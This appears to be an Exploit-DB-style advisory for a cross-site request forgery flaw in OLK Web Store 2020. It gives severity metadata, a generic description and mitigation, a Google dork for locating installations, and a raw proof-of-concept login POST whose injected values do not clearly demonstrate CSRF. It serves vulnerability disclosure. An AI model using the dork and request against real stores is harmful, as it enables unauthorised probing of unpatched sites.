OLK Web Store 2020 - Cross-Site Request Forgery

vendor:

OLK Web Store

by:

Joel Aviad Ossi

8.8

CVSS

HIGH

Cross-Site Request Forgery

352

CWE

Product Name: OLK Web Store

Affected Version From: 2020

Affected Version To: 2020

Patch Exists: NO

Related CWE: N/A

CPE: a:topmanage:olk_web_store:2020

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: N/A

2020

OLK Web Store 2020 – Cross-Site Request Forgery

This exploit allows an attacker to perform a Cross-Site Request Forgery (CSRF) attack against the OLK Web Store 2020. The attacker can craft a malicious request to the login page of the OLK Web Store 2020, which will then be executed by the victim's browser. The malicious request will contain the attacker's credentials, which will be used to authenticate the attacker and gain access to the OLK Web Store 2020.

Mitigation:

The best way to mitigate CSRF attacks is to use a combination of server-side and client-side security measures. On the server-side, the application should use a secret token to verify that the request is coming from a legitimate user. On the client-side, the application should use a CAPTCHA or other form of authentication to verify that the user is a human.

Source

Exploit-DB raw data:

# Exploit Title: OLK Web Store 2020 - Cross-Site Request Forgery
# Google Dork: intext:"TopManage ® 2002 - 2020"
# Date: 2020-01-13
# Exploit Author: Joel Aviad Ossi
# Vendor Homepage: http://www.topmanage.com/
# Software Link: http://www.topmanage.com/microsites/olk-web-store/
# Version: 2020
# Tested on: N/A
# CVE : N/A

# Reference: https://websec.nl/news.php 

POST /olk/client/login.asp HTTP/1.1
Host: examplesite.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
Origin: https://examplesite.com
Connection: close
Referer: https://examplesite.com/olk/client/login.asp?se=Y
Cookie: myLng=en; ASPSESSIONIDCGARQSCD=JGFFLBIAAKGBKANKLAPHMEDH
Upgrade-Insecure-Requests: 1

dbID=0&UserName=%22%3EPOC&Password=%22%3ECSRF&newLng=en&btnEnter=Enter&sHeight=400&other=